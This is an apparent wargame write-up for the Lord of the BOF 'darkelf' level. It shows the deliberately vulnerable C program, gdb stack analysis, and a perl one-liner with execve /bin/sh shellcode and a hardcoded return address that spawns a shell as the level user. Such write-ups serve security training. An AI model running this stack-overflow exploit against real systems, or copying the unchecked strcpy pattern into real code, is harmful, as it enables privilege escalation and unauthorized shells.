
[wolfman@localhost wolfman]$ cat darkelf.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - darkelf 

        - egghunter + buffer hunter + check length of argv[1]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


/*
 * Lord of the BOF "darkelf" target: an intentionally vulnerable program.
 *
 * Notes for readers of the listing:
 *  - `main` has an implicit int return type and memset/strlen/strcpy are
 *    called without <string.h> (only stdio.h and stdlib.h are included
 *    above), so they are implicitly declared; this builds on the old gcc
 *    used in this writeup but would not on a modern compiler.
 *  - argv[1] is untrusted input; every check below is a mitigation the
 *    level adds on top of the plain strcpy overflow, and the transcript
 *    after this listing shows how each one is sidestepped.
 */
main(int argc, char *argv[])

{

/* 40-byte destination for argv[1]; the length check below allows 48. */
char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// egghunter 
// Zero every environment string in place, so shellcode cannot be staged
// in an environment variable (the classic "egg").

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


// Byte 47 of argv[1] ends up as the most significant byte of the
// overwritten return address (the core below dies at 0xbf909090, i.e.
// payload bytes 44..47), so the return address is forced into the
// 0xbfxxxxxx stack region.  Note this index is read BEFORE the length
// check: a shorter argv[1] makes this read past its terminator into
// whatever follows argv[1] in memory.
if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument
// Exactly 48 bytes are still accepted, but buffer holds 40: strcpy below
// copies 49 bytes including the NUL, so the saved frame pointer and
// return address (bytes 40..47 of argv[1]) are overwritten.

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter
        // Wipe the local buffer before returning so shellcode placed in
        // `buffer` itself is gone by the time the corrupted return
        // address is used.  The copy of argv[1] that the kernel placed
        // higher on the stack is untouched, which is where the exploit
        // in the transcript returns to (0xbffffc28).

        memset(buffer, 0, 40);

}

[wolfman@localhost wolfman]$ vi darkelv.c  /* First make a working copy to crash and inspect. The copy is deliberately given a name of the same length as the target (darkelv / darkelf): argv[0] sits directly below argv[1] on the stack (0xbffffc1e vs 0xbffffc28 in the dump below), so a name of a different length would shift the argv[1] address found here and the final run against darkelf would miss. The copy runs with your own uid (euid 505 below), the real binary as the level's uid (euid 506). */

[wolfman@localhost wolfman]$ gcc darkelv.c -o darkelv

[wolfman@localhost wolfman]$ ./darkelv `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x13, "\xbf"'`

j

 X?Rh//shh/bin??S?訴€????????????????????????

Segmentation fault (core dumped)

[wolfman@localhost wolfman]$ gdb -q darkelv core

Core was generated by `./darkelv j

                                  X?Rh//shh/bin??S?訴€?????????????????????????.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbf909090 in ?? ()

(gdb) x/50wx $esp /* Dump the stack upward from $esp to locate the kernel's copy of argv[1], which is where the shellcode actually lives (buffer itself is wiped before return). */

0xbffffae0: 0x00000000 0xbffffb24    0xbffffb30    0x40013868

0xbffffaf0: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffb00: 0x08048500 0x00000002 0xbffffb24    0x08048390

0xbffffb10: 0x0804864c 0x4000ae60 0xbffffb1c    0x40013e90

0xbffffb20: 0x00000002 0xbffffc1e    0xbffffc28    0x00000000

0xbffffb30: 0xbffffc59    0xbffffc6b    0xbffffc82    0xbffffca1

0xbffffb40: 0xbffffcc3    0xbffffcd0    0xbffffe93    0xbffffeb2

0xbffffb50: 0xbffffecf     0xbffffee4    0xbfffff03     0xbfffff0e

0xbffffb60: 0xbfffff26            0xbfffff36     0xbfffff3e     0xbfffff48

0xbffffb70: 0xbfffff58     0xbfffff66     0xbfffff74     0xbfffff85

0xbffffb80: 0xbfffff90     0xbfffffa3     0xbfffffe6     0x00000000

0xbffffb90: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffba0: 0x00000005 0x00000006

(gdb) 

0xbffffba8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffbb8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffbc8: 0x0000000b 0x000001f9 0x0000000c 0x000001f9

0xbffffbd8: 0x0000000d 0x000001f9 0x0000000e 0x000001f9

0xbffffbe8: 0x00000010 0x0febfbff     0x0000000f  0xbffffc19

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc18: 0x38366900 0x2f2e0036      0x6b726164 0x00766c65

0xbffffc28: 0x99580b6a 0x2f2f6852       0x2f686873 0x896e6962 // argv[1] starts here: 0x99580b6a is "\x6a\x0b\x58\x99", the first shellcode bytes, followed by the NOP sled

0xbffffc38:0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x90909090 0x90909090 0xbf909090

0xbffffc58: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc68: 0x00000000 0x00000000

(gdb) 

0xbffffc70: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc80: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc90: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd30: 0x00000000 0x00000000

(gdb) quit

[wolfman@localhost wolfman]$ ./darkelv `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x28\xfc\xff\xbf"'` /* Replace the last four bytes with 0xbffffc28 (little-endian \x28\xfc\xff\xbf), the address of argv[1] found above, and rerun. The payload is still exactly 48 bytes (23 + 11 + 10 + 4) so it passes the length check, and its last byte is still 0xbf so it passes the argv[1][47] check. */

j

 X?Rh//shh/bin??S?訴€?????????????????????(?

bash$ my-pass

euid = 505

love eyuna

bash$ quit

sh: quit: command not found

bash$ exit

exit

[wolfman@localhost wolfman]$ ./darkelf `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x28\xfc\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€?????????????????????(?

bash$ my-pass

euid = 506

// Shell obtained as the darkelf user (euid 506).

Once one of these levels falls, the rest go quickly.

I did not bother writing up the method at first (added this explanation later for my own reference); the whole solve is finding the address of the shellcode and plugging it in. Why the level's three mitigations do not stop this: the "egghunter" only wipes environment strings and the "buffer hunter" only wipes the 40-byte local buffer, but neither touches the kernel's copy of argv[1] higher on the stack, so the shellcode is placed there and the return address is pointed at it. The length check still allows 48 bytes, which is enough to reach the return address, and the argv[1][47] == 0xbf requirement is satisfied by any 0xbfxxxxxx stack address.
